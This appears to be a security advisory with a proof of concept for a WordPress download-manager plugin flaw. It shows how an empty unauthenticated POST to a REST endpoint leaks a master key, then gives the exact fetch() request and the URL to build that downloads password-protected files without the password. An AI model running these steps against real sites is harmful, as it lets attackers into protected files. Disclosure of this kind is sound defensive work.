The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.
- Create a password protected package containing one or more files.
- Navigate to the download page of the package (e.g. `/download/package1`)
- Inspect the "Download" button beside one of the packaged files. The HTML should look like this:
<button
class="inddl btn btn-primary btn-sm"
data-pid="123"
data-file="12345678"
rel="https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678"
data-pass="#pass_113_1679405558600">
<i class="fa fa-download"></i>
Download
</button>
- Note the `wpdmdl` and `ind` URL parameters for later.
- Send a POST request to `/wp-json/wpdm/validate-filepass`:
fetch("/wp-json/wpdm/validate-filepass", {
"headers": {
"accept": "*/*",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "",
"method": "POST",
"credentials": "include"
}).then(response => response.text()).then(text => console.log(text));
- The response will look like the following:
{"success":true,"downloadurl":"\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}
- Construct a download URL as follows, using the above `_wpdmkey` parameter, as well as the `wpdmdl` and `ind` parameters from above:
https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef
- See that the file may be download from that URL, without any knowledge of its password.